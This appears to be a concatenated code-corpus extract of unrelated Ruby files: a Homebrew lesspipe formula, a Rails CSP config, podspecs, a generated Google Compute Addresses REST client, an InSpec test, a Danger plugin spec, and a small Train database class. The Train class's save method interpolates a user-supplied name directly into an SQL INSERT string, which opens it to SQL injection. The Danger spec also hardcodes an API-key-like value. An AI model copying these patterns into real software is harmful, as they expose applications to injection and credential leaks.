mrbc.run f, rbfiles, 'mrblib_irep'
end
end
end
| 38.157895 | 108 | 0.686897 |
d580ae87dcc8fdcecbefc141145ba16a5c62b968 | 1,287 | class Lesspipe < Formula
desc "Input filter for the pager less"
homepage "https://www-zeuthen.desy.de/~friebel/unix/lesspipe.html"
url "https://downloads.sourceforge.net/project/lesspipe/lesspipe/1.82/lesspipe-1.82.tar.gz"
sha256 "3fd345b15d46cc8fb0fb1d625bf8d881b0637abc34d15df45243fd4e5a8f4241"
bottle do
cellar :any
sha256 "3a8e56f9b9b38d291d57f3a702e0dfb488814fb4686594084aa10a97f0cf2448" => :yosemite
sha256 "f33d17225509888d6193b1c5bac74577168d57cccd274065d195c9661774c68a" => :mavericks
sha256 "201d33d2ae2aff83e00bbcea23bf872f2a20938ba194d175426837fc041117c0" => :mountain_lion
end
option "with-syntax-highlighting", "Build with syntax highlighting"
deprecated_option "syntax-highlighting" => "with-syntax-highlighting"
def install
if build.with? "syntax-highlighting"
inreplace "configure", %q($ifsyntax = "\L$ifsyntax";), %q($ifsyntax = "\Ly";)
end
system "./configure", "--prefix=#{prefix}", "--yes"
man1.mkpath
system "make", "install"
end
test do
touch "file1.txt"
touch "file2.txt"
system "tar", "-cvzf", "homebrew.tar.gz", "file1.txt", "file2.txt"
assert File.exist?("homebrew.tar.gz")
assert_match /file2.txt/, shell_output("tar tvzf homebrew.tar.gz | #{bin}/tarcolor")
end
end
| 34.783784 | 95 | 0.72805 |
33d0159553a776a1e8a457d3d97f16993fbe539c | 100 | # frozen_string_literal: true
module Authentication
end
require 'authentication/subject_receiver'
| 14.285714 | 41 | 0.85 |
217240d5525a35969a42da66372b3ff5c735cbfa | 173 | Rails.application.config.content_security_policy do |policy|
policy.connect_src :self, :http, "http://localhost:3035", "ws://localhost:3035" if Rails.env.development?
end
| 43.25 | 107 | 0.774566 |
f7e2bb2256559a6ee9f83473d06f07379529d6ef | 1,100 | require("pry")
class Train
attr_writer(:train_name)
def initialize(attributes)
@train_name = attributes.fetch(:train_name)
end
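  # Returns an array of hashes, each shaped like
  #   { :train_name => "Blue Line", :train_id => 1 }
  # (the values above are illustrative).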
def self.all
returned_trains = DB.exec("SELECT * FROM train;")
trains = []
returned_trains.each() do |train|
name = train.fetch("name")
train_id = train.fetch("id").to_i() # The information comes out of the database as a string.
unless name == nil
trains.push({:train_name => name, :train_id => train_id})
# trains.push(Train.new({:train_name => name}))
end
end
trains
end
def save
DB.exec("INSERT INTO train (name) VALUES ('#{@train_name}');")
end
# def self.sort
# returned_sorted_lists = DB.exec("SELECT * FROM tasks ORDER BY due_date;")
# @lists = []
# returned_sorted_lists.each() do |list|
# description = list.fetch("description")
# list_id = list.fetch("list_id").to_i()
# due_date = list.fetch("due_date")
# @lists.push(Task.new({:description => description, :list_id => list_id, :due_date => due_date}))
# end
# @lists
# end
end
| 26.829268 | 104 | 0.623636 |
e25d42626b91b67298f961f38c5610806c33052f | 825 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'file_chooser'
s.version = '0.0.1'
s.summary = 'Displays macOS open and save panels.'
s.description = <<-DESC
Displays macOS open and save panels.
DESC
s.homepage = 'https://github.com/google/flutter-desktop-embedding/tree/master/plugins/file_chooser'
s.license = { :file => '../LICENSE' }
s.author = { 'Flutter Desktop Embedding Developers' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'FlutterMacOS'
s.platform = :osx
s.osx.deployment_target = '10.9'
end
| 35.869565 | 117 | 0.602424 |
6231b1199af5919c254e7b339079d8e618cb2097 | 34,810 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/cloud/compute/v1/compute_small_pb"
module Google
module Cloud
module Compute
module V1
module Addresses
module Rest
##
# REST client for the Addresses service.
#
# Services
#
# The Addresses API.
#
class Client
include GrpcTranscoding
# @private
attr_reader :addresses_stub
##
# Configure the Addresses Client class.
#
# See {::Google::Cloud::Compute::V1::Addresses::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# ## Example
#
# To modify the configuration for all Addresses clients:
#
# ::Google::Cloud::Compute::V1::Addresses::Rest::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
namespace = ["Google", "Cloud", "Compute", "V1"]
parent_config = while namespace.any?
parent_name = namespace.join "::"
parent_const = const_get parent_name
break parent_const.configure if parent_const.respond_to? :configure
namespace.pop
end
default_config = Client::Configuration.new parent_config
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the Addresses Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Compute::V1::Addresses::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new Addresses REST client object.
#
# ## Examples
#
# To create a new Addresses REST client with the default
# configuration:
#
# client = ::Google::Cloud::Compute::V1::Addresses::Rest::Client.new
#
# To create a new Addresses REST client with a custom
# configuration:
#
# client = ::Google::Cloud::Compute::V1::Addresses::Rest::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Addresses client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the REST modules only when it's required.
require "gapic/rest"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
credentials ||= Credentials.default scope: @config.scope
if credentials.is_a?(String) || credentials.is_a?(Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@client_stub = ::Gapic::Rest::ClientStub.new endpoint: @config.endpoint, credentials: credentials
end
# Service calls
##
# Retrieves an aggregated list of addresses.
#
# @overload aggregated_list(request, options = nil)
# Pass arguments to `aggregated_list` via a request object, either of type
# {::Google::Cloud::Compute::V1::AggregatedListAddressesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::AggregatedListAddressesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload aggregated_list(filter: nil, include_all_scopes: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil)
# Pass arguments to `aggregated_list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param include_all_scopes [::Boolean]
# Indicates whether every visible scope for each scope type (zone, region, global) should be included in the response. For new resource types added after this field, the flag has no effect as new resource types will always include every visible scope for each scope type in response. For resource types which predate this field, if this flag is omitted or false, only scopes of the scope types where the resource type is expected to be found will be included.
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false and the logic is the same as today.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::AddressAggregatedList]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::AddressAggregatedList]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def aggregated_list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::AggregatedListAddressesRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_aggregated_list request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::AddressAggregatedList.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Deletes the specified address resource.
#
# @overload delete(request, options = nil)
# Pass arguments to `delete` via a request object, either of type
# {::Google::Cloud::Compute::V1::DeleteAddressRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::DeleteAddressRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload delete(address: nil, project: nil, region: nil, request_id: nil)
# Pass arguments to `delete` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param address [::String]
# Name of the address resource to delete.
# @param project [::String]
# Project ID for this request.
# @param region [::String]
# Name of the region for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def delete request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::DeleteAddressRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_delete request
response = @client_stub.make_delete_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Returns the specified address resource.
#
# @overload get(request, options = nil)
# Pass arguments to `get` via a request object, either of type
# {::Google::Cloud::Compute::V1::GetAddressRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::GetAddressRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload get(address: nil, project: nil, region: nil)
# Pass arguments to `get` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param address [::String]
# Name of the address resource to return.
# @param project [::String]
# Project ID for this request.
# @param region [::String]
# Name of the region for this request.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Address]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Address]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def get request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::GetAddressRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, _query_string_params = transcode_get request
response = @client_stub.make_get_request(
uri: uri,
options: options
)
result = ::Google::Cloud::Compute::V1::Address.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Creates an address resource in the specified project by using the data included in the request.
#
# @overload insert(request, options = nil)
# Pass arguments to `insert` via a request object, either of type
# {::Google::Cloud::Compute::V1::InsertAddressRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::InsertAddressRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload insert(address_resource: nil, project: nil, region: nil, request_id: nil)
# Pass arguments to `insert` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param address_resource [::Google::Cloud::Compute::V1::Address, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param region [::String]
# Name of the region for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def insert request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::InsertAddressRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, body, _query_string_params = transcode_insert request
response = @client_stub.make_post_request(
uri: uri,
body: body,
options: options
)
result = ::Google::Cloud::Compute::V1::Operation.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Retrieves a list of addresses contained within the specified region.
#
# @overload list(request, options = nil)
# Pass arguments to `list` via a request object, either of type
# {::Google::Cloud::Compute::V1::ListAddressesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ListAddressesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload list(filter: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, region: nil, return_partial_success: nil)
# Pass arguments to `list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param region [::String]
# Name of the region for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false and the logic is the same as today.
# @yield [result, env] Access the result along with the Faraday environment object
# @yieldparam result [::Google::Cloud::Compute::V1::AddressList]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::AddressList]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ListAddressesRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
uri, _body, query_string_params = transcode_list request
response = @client_stub.make_get_request(
uri: uri,
params: query_string_params,
options: options
)
result = ::Google::Cloud::Compute::V1::AddressList.decode_json response.body, ignore_unknown_fields: true
yield result, response if block_given?
result
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Configuration class for the Addresses REST API.
#
# This class represents the configuration for Addresses REST,
# providing control over credentials, timeouts, retry behavior, logging.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# # Examples
#
# To modify the global config, setting the timeout for all calls to 10 seconds:
#
# ::Google::Cloud::Compute::V1::Addresses::Client.configure do |config|
# config.timeout = 10.0
# end
#
# To apply the above configuration only to a new client:
#
# client = ::Google::Cloud::Compute::V1::Addresses::Client.new do |config|
# config.timeout = 10.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"compute.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "compute.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr :timeout, nil, ::Numeric, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
end
end
end
end
end
end
end
end
| 58.113523 | 477 | 0.576271 |
e90244f982379afff5911ddbc4e2e79f968964a5 | 1,558 | # ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** Type: MMv1 ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file in README.md and
# CONTRIBUTING.md located at the root of this package.
#
# ----------------------------------------------------------------------------
title 'Test GCP google_compute_target_pools resource.'
gcp_project_id = attribute(:gcp_project_id, default: 'gcp_project_id', description: 'The GCP project identifier.')
gcp_location = attribute(:gcp_location, default: 'gcp_location', description: 'The GCP project region.')
gcp_ext_vm_name = attribute(:gcp_ext_vm_name, default: 'gcp_ext_vm_name', description: 'The name of a VM instance.')
target_pool = attribute('target_pool', default: {
"name": "inspec-gcp-target-pool",
"session_affinity": "CLIENT_IP"
}, description: 'Target pool definition')
gcp_zone = attribute(:gcp_zone, default: 'gcp_zone', description: 'The GCP zone.')
control 'google_compute_target_pools-1.0' do
impact 1.0
title 'google_compute_target_pools resource test'
describe google_compute_target_pools(project: gcp_project_id, region: gcp_location) do
its('names') { should include target_pool['name'] }
its('session_affinities') { should include target_pool['session_affinity'] }
end
end
| 45.823529 | 116 | 0.629012 |
e900d05d5a3c173bf7eaec8f259983da01244727 | 938 | # frozen_string_literal: false
require File.expand_path('spec_helper', __dir__)
module Danger
describe Danger::DangerTinyPNG do
it "should be a plugin" do
expect(Danger::DangerTinyPNG.new(nil)).to be_a Danger::Plugin
end
describe "with Dangerfile" do
before do
@dangerfile = testing_dangerfile
@tiny_png = @dangerfile.tiny_png
# mock the PR data
# you can then use this, eg. github.pr_author, later in the spec
json = File.read(File.dirname(__FILE__) + '/support/fixtures/github_pr.json') # example json: `curl https://api.github.com/repos/danger/danger-plugin-template/pulls/18 > github_pr.json`
allow(@tiny_png.github).to receive(:pr_json).and_return(json)
end
      it "validates the TinyPNG API key" do
@tiny_png.api_key 'VyqfYht4H5xhZ8lTVwc4265GZy3GPRdF'
expect(@dangerfile.status_report[:errors]).to eq([])
end
end
end
end
| 31.266667 | 193 | 0.684435 |
e8790cf01ab4d1ac85198ad0598befed08c8f393 | 354 | # Copyright:: Copyright 2021 Trimble Inc.
# License:: The MIT License (MIT)
# This is raised whenever a method attempts to modify any {Layout::Entity}
# that resides on a locked {Layout::Layer}, or when attempting to change the
# shared attribute of a locked {Layout::Layer}.
#
# @version LayOut 2018
class Layout::LockedLayerError < ArgumentError
end
| 29.5 | 76 | 0.751412 |
b941f0306bb837bace7627179a503bf3f3879a21 | 5,355 | Pod::Spec.new do |s|
s.name = 'FirebaseRemoteConfig'
s.version = '8.7.0'
s.summary = 'Firebase Remote Config'
s.description = <<-DESC
Firebase Remote Config is a cloud service that lets you change the
appearance and behavior of your app without requiring users to download an
app update.
DESC
s.homepage = 'https://firebase.google.com'
s.license = { :type => 'Apache', :file => 'LICENSE' }
s.authors = 'Google, Inc.'
s.source = {
:git => 'https://github.com/firebase/firebase-ios-sdk.git',
:tag => 'CocoaPods-' + s.version.to_s
}
s.social_media_url = 'https://twitter.com/Firebase'
ios_deployment_target = '10.0'
osx_deployment_target = '10.12'
tvos_deployment_target = '10.0'
watchos_deployment_target = '6.0'
s.ios.deployment_target = ios_deployment_target
s.osx.deployment_target = osx_deployment_target
s.tvos.deployment_target = tvos_deployment_target
s.watchos.deployment_target = watchos_deployment_target
s.cocoapods_version = '>= 1.4.0'
s.prefix_header_file = false
base_dir = "FirebaseRemoteConfig/Sources/"
s.source_files = [
base_dir + '**/*.[mh]',
'Interop/Analytics/Public/*.h',
'FirebaseABTesting/Sources/Private/*.h',
'FirebaseCore/Sources/Private/*.h',
'FirebaseInstallations/Source/Library/Private/*.h',
]
s.public_header_files = base_dir + 'Public/FirebaseRemoteConfig/*.h'
s.pod_target_xcconfig = {
'GCC_C_LANGUAGE_STANDARD' => 'c99',
'HEADER_SEARCH_PATHS' => '"${PODS_TARGET_SRCROOT}"'
}
s.dependency 'FirebaseABTesting', '~> 8.0'
s.dependency 'FirebaseCore', '~> 8.0'
s.dependency 'FirebaseInstallations', '~> 8.0'
s.dependency 'GoogleUtilities/Environment', '~> 7.4'
s.dependency 'GoogleUtilities/NSData+zlib', '~> 7.4'
s.test_spec 'unit' do |unit_tests|
unit_tests.scheme = { :code_coverage => true }
# TODO(dmandar) - Update or delete the commented files.
unit_tests.source_files =
'FirebaseRemoteConfig/Tests/Unit/FIRRemoteConfigComponentTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNConfigContentTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNConfigDBManagerTest.m',
# 'FirebaseRemoteConfig/Tests/Unit/RCNConfigSettingsTest.m',
# 'FirebaseRemoteConfig/Tests/Unit/RCNConfigTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNConfigExperimentTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNConfigValueTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNPersonalizationTest.m',
# 'FirebaseRemoteConfig/Tests/Unit/RCNRemoteConfig+FIRAppTest.m',
'FirebaseRemoteConfig/Tests/Unit/RCNRemoteConfigTest.m',
# 'FirebaseRemoteConfig/Tests/Unit/RCNThrottlingTests.m',
'FirebaseRemoteConfig/Tests/Unit/RCNTestUtilities.m',
'FirebaseRemoteConfig/Tests/Unit/RCNUserDefaultsManagerTests.m',
'FirebaseRemoteConfig/Tests/Unit/RCNTestUtilities.h',
'FirebaseRemoteConfig/Tests/Unit/RCNInstanceIDTest.m'
    # Supply custom plists for testing.
unit_tests.resources =
'FirebaseRemoteConfig/Tests/Unit/Defaults-testInfo.plist',
'FirebaseRemoteConfig/Tests/Unit/SecondApp-GoogleService-Info.plist',
'FirebaseRemoteConfig/Tests/Unit/TestABTPayload.txt'
unit_tests.requires_app_host = true
unit_tests.dependency 'OCMock'
unit_tests.requires_arc = true
end
# Run Swift API tests on a real backend.
s.test_spec 'swift-api-tests' do |swift_api|
swift_api.scheme = { :code_coverage => true }
swift_api.platforms = {
:ios => ios_deployment_target,
:osx => osx_deployment_target,
:tvos => tvos_deployment_target
}
swift_api.source_files = 'FirebaseRemoteConfig/Tests/SwiftAPI/*.swift',
'FirebaseRemoteConfig/Tests/FakeUtils/*.[hm]',
'FirebaseRemoteConfig/Tests/FakeUtils/*.swift'
swift_api.requires_app_host = true
